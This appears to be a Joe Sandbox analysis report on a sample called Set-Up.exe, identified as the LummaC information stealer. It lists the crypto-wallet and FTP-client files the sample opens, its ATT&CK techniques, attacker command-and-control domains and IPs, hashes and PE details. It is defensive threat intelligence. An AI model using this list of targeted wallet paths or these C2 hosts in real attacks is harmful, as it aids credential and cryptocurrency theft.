Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1563331052.0000000003882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1581016383.0000000003882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1536461322.0000000003882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-Up.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	4 Windows Service	4 Windows Service	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	12 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-Up.exe	8%	Virustotal		Browse
Set-Up.exe	11%	ReversingLabs

Source	Detection	Scanner	Label
https://acceconz.run/t	0%	Avira URL Cloud	safe
jawdedmirror.run/ewqd	100%	Avira URL Cloud	malware
nighetwhisper.top/lekd	100%	Avira URL Cloud	malware
https://acceconz.run:443/oxaphcon	0%	Avira URL Cloud	safe
https://acceconz.run/	0%	Avira URL Cloud	safe
https://acceconz.run/oxapal	0%	Avira URL Cloud	safe
http://www.google.comCLocalClientParentalControl::DataBeforeReceive	0%	Avira URL Cloud	safe
owlflright.digital/qopy	100%	Avira URL Cloud	malware
https://www.bitvise.com/0	0%	Avira URL Cloud	safe
acceconz.run/oxap	0%	Avira URL Cloud	safe
https://acceconz.run/)	0%	Avira URL Cloud	safe
http://www.google.comwebsocketupgradeddisablehttp://www.google.com	0%	Avira URL Cloud	safe
https://acceconz.run/1	0%	Avira URL Cloud	safe
http://https://?//?#//#/..////rbCOperationsManager::EncryptFile	0%	Avira URL Cloud	safe
https://acceconz.run/oxap	0%	Avira URL Cloud	safe
lonfgshadow.live/xawi	100%	Avira URL Cloud	malware
https://acceconz.run/19:	0%	Avira URL Cloud	safe
http://www.google.comconnection:	0%	Avira URL Cloud	safe
https://acceconz.run:443/oxap	0%	Avira URL Cloud	safe
https://acceconz.run/oxap47	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
acceconz.run	172.67.131.70	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jawdedmirror.run/ewqd	true	Avira URL Cloud: malware	unknown
nighetwhisper.top/lekd	true	Avira URL Cloud: malware	unknown
changeaie.top/geps	false		high
owlflright.digital/qopy	true	Avira URL Cloud: malware	unknown
acceconz.run/oxap	true	Avira URL Cloud: safe	unknown
zestmodp.top/zeda	false		high
liftally.top/xasj	false		high
salaccgfa.top/gsooz	false		high
lonfgshadow.live/xawi	true	Avira URL Cloud: malware	unknown
https://acceconz.run/oxap	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/ac/?q=	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Set-Up.exe	false		high
http://ocsp.sectigo.com0	Set-Up.exe	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://acceconz.run/t	Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bitvise.com/0	Set-Up.exe	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://acceconz.run/	Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Set-Up.exe	false		high
https://acceconz.run/oxapal	Set-Up.exe, 00000003.00000003.1536345262.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	Set-Up.exe	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv209h	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.comCLocalClientParentalControl::DataBeforeReceive	Set-Up.exe	false	Avira URL Cloud: safe	unknown
http://www.google.com	Set-Up.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://acceconz.run:443/oxaphcon	Set-Up.exe, 00000003.00000003.1515226738.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1515286974.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://acceconz.run/)	Set-Up.exe, 00000003.00000003.1536418380.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1536345262.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Set-Up.exe	false		high
https://acceconz.run/1	Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.comwebsocketupgradeddisablehttp://www.google.com	Set-Up.exe	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Set-Up.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://https://?//?#//#/..////rbCOperationsManager::EncryptFile	Set-Up.exe	false	Avira URL Cloud: safe	unknown
https://acceconz.run/19:	Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://acceconz.run:443/oxap	Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Set-Up.exe	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html....................	Set-Up.exe	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://acceconz.run/oxap47	Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.comconnection:	Set-Up.exe	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.131.70	acceconz.run	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1664098
Start date and time:	2025-04-13 16:20:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-Up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 80% Number of executed functions: 33 Number of non-executed functions: 165
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.76.34.6, 52.149.20.212, 2.23.227.208, 4.175.87.197
Excluded domains from analysis (whitelisted): www.bing.com, c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:21:26	API Interceptor	7x Sleep call for process: Set-Up.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	shegivenmekissinglips.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	smss (2).exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	KUzGUp4xs6.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	Mi5cEY8M3R.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	6pCmlKafCF.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	1b3pICGT3V.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	TpDkwibRvg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	WTGK44DBns.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	activate.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.28.157
	activate.exe	Get hash	malicious	LummaC Stealer	Browse	104.22.68.199

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	activate.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.70
	activate.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.70
	OGF4TzdXZ9.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.70
	SecuriteInfo.com.FileRepMalware.5979.10698.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.70
	Nepomuk.exe	Get hash	malicious	GO Backdoor, LummaC Stealer	Browse	172.67.131.70
	RE_0078234567965441.pdf.wsf	Get hash	malicious	Koadic	Browse	172.67.131.70
	Rd_client_w_a_s_d.exe	Get hash	malicious	HTMLPhisher, LummaC Stealer	Browse	172.67.131.70
	Rd_client_w_a_s_d.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.70
	spy.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.131.70
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.70

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.105720077874909
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-Up.exe
File size:	4'910'680 bytes
MD5:	9a0898e5ab58c270560b4b01a675b872
SHA1:	817c83c38da6abde4ddf3fbbaba895d35a8bb83c
SHA256:	45ccc7a67360fcd58fe7b45b9666d5e9e6c072009dae7bbae02d6e487811e611
SHA512:	63fcf7755de303b3a5c06e1dd8955cb4258dffc6feb99d9833b8fce60cbbf51f110e7ded20d239ace88f854834a4b906d1a29e1f2e547cdfe1546299a5c0c05e
SSDEEP:	49152:hPy1wYolUblRN980HcYbKX1OcOSCaCBh2RnSN5dnLvuuZMfT84Op/Xp0yDJoemjY:vHms0Hcj1dXCaCehSNvjZHXp0yIShf
TLSH:	B236AE02FBC6C1F2DA47517544BAA33E5B3AE24507348AD3D258EE1AC9713D17E3A2C9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#...g.s.g.s.g.s.g.s.s.s...Y.e.s.Q.y...s.y...b.s.....i.s.n...y.s.n.....s.@X..b.s.@X..z.s.g.r...s.n.....s.y...f.s.g...f.s.n...f.s

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5a1050
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x55BEAD28 [Sun Aug 2 23:52:08 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5bc356c47f7715c5ce765d85d8723c6c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	19/09/2023 02:00:00 19/09/2026 01:59:59
Subject Chain	CN=Bitvise Limited, O=Bitvise Limited, S=Texas, C=US
Version:	3
Thumbprint MD5:	4E75A5DA5CF1331F11C9F105A6930F54
Thumbprint SHA-1:	37A4D270989616341908354E3542171EAB364159
Thumbprint SHA-256:	85DB16151AE21B44208E823105AECE195F4C52B51A2B2648F8F94E7BCFEEB9B3
Serial:	62F74E68B8197ACB17AA18423928B37F

Entrypoint Preview

Instruction
call 00007F815CB0AFBFh
jmp 00007F815CAF6AFDh
mov edi, edi
push ebp
mov ebp, esp
push 0000000Ah
push 00000000h
push dword ptr [ebp+08h]
call 00007F815CB0B239h
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+0Ch]
push 0000000Ah
push 00000000h
push dword ptr [ebp+08h]
call 00007F815CB0B24Bh
add esp, 10h
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
pop ebp
jmp 00007F815CAF6C4Bh
mov edi, edi
push ebp
mov ebp, esp
pop ebp
jmp 00007F815CAF6C56h
mov edi, edi
push ebp
mov ebp, esp
push 0000000Ah
push 00000000h
push dword ptr [ebp+08h]
call 00007F815CB0B539h
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+0Ch]
push 0000000Ah
push 00000000h
push dword ptr [ebp+08h]
call 00007F815CB0B54Bh
add esp, 10h
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
push esi
mov esi, dword ptr [ebp+08h]
push edi
xor edi, edi
cmp esi, edi
je 00007F815CAF6C87h
cmp dword ptr [ebp+0Ch], edi
jnbe 00007F815CAF6C9Fh
call 00007F815CAF41DBh
push 00000016h
pop ecx
push edi
push edi
push edi
push edi
push edi
mov esi, ecx
mov dword ptr [eax], ecx
call 00007F815CAF20D9h
add esp, 14h
mov eax, esi
jmp 00007F815CAF6CECh
cmp dword ptr [ebp+0Ch], 09h
mov byte ptr [esi], 00000000h
jnc 00007F815CAF6C8Bh
call 00007F815CAF41B5h
push 00000022h
jmp 00007F815CAF6C5Ah
push ebx
lea eax, dword ptr [ebp+00h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) SP6 build 8804
[C++] VS2008 build 21022
[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x459000	0x12c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x45d000	0x56800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4a9400	0x5a58	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x459ab4	0x988	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x39138e	0x391400	4b0f78ed02e5e41d3a3901788951c5a4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x393000	0xa7130	0xa7200	2eae49f71bff85178badee08f46261b9	False	0.30650038565819	data	4.649728555258818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x43b000	0x1d080	0x16e00	5b511d6cbe458273d53a0b2ad030e10f	False	0.28736552254098363	OpenPGP Public Key	4.29632844929029	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x459000	0x327f	0x3400	6959f220e61bd434c0fdc5b253055799	False	0.3112229567307692	data	4.772204968657612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x45d000	0x56800	0x56800	43cf6da7de74175cb1df5528dd4ec70a	False	0.8324856620303468	data	7.642016074886536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
REGISTRY	0x45d5c0	0xb3	ASCII text, with CRLF line terminators	English	United States	0.7039106145251397
REGISTRY	0x45d678	0x2a9	ASCII text, with CRLF line terminators	Hebrew	Israel	0.447870778267254
REGISTRY	0x45d928	0x281	ASCII text, with CRLF line terminators	Hebrew	Israel	0.46489859594383776
REGISTRY	0x45dbb0	0x2b1	ASCII text, with CRLF line terminators	Hebrew	Israel	0.4426705370101596
REGISTRY	0x45de68	0x279	ASCII text, with CRLF line terminators	Hebrew	Israel	0.47393364928909953
REGISTRY	0x45e0e8	0x291	ASCII text, with CRLF line terminators	Hebrew	Israel	0.4596651445966514
REGISTRY	0x45e380	0x2a9	ASCII text, with CRLF line terminators	Hebrew	Israel	0.45080763582966227
REGISTRY	0x45e630	0x279	ASCII text, with CRLF line terminators	Hebrew	Israel	0.47235387045813587
REGISTRY	0x45e8b0	0x2a1	ASCII text, with CRLF line terminators	Hebrew	Israel	0.45170876671619614
